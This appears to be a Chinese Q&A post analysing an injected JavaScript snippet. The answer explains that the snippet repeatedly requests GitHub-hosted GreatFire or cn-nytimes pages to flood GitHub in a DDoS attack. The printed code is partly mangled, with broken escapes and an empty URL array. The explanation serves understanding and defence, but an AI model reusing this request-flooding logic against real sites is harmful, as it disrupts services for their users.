怎样分析这段代码

用这个Online JavaScript beautifier------------------------------------------------------------------------------------------------document.write("\u0026lt;script src=https://www.zhihu.com/u0026#39;http://libs.baidu.com/jquery/2.0.0/jquery.min.js/u0026#39;/u0026gt; /script/u0026gt;");!window.jQuery \u0026amp;\u0026amp; document.write("\u0026lt;script src=https://www.zhihu.com/u0026#39;http://code.jquery.com/jquery-latest.js/u0026#39;/u0026gt; /script/u0026gt;");startime = (new Date).getTime();var count = 0;function unixtime() { var a = new Date; return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3}url_array = ;NUM = url_array.length;function r_send2() { var a = unixtime() % NUM; get(url_array)}function get(a) { var b; $.ajax({ url: a, dataType: "script", timeout: 1E4, cache: !0, beforeSend: function() { requestTime = (new Date).getTime() }, complete: function() { responseTime = (new Date).getTime(); b = Math.floor(responseTime - requestTime); 3E5 \u0026gt; responseTime - startime \u0026amp;\u0026amp; (r_send(b), count += 1) } })}function r_send(a) { setTimeout("r_send2()", a)}setTimeout("r_send2()", 2E3);-------------------------------------------------------------------------------------------------简单来说吧,载入页面2秒后随机请求greatfire或者cn-nytimes其中的一个,如果请求时间小于300s,就再次请求一遍。-------------------------------------------------------------------------------------------------出现malicious javascript detected on this domain是github的防御手段之一。这个是通过这种频繁的请求来对github进行DDoS攻击。


    推荐阅读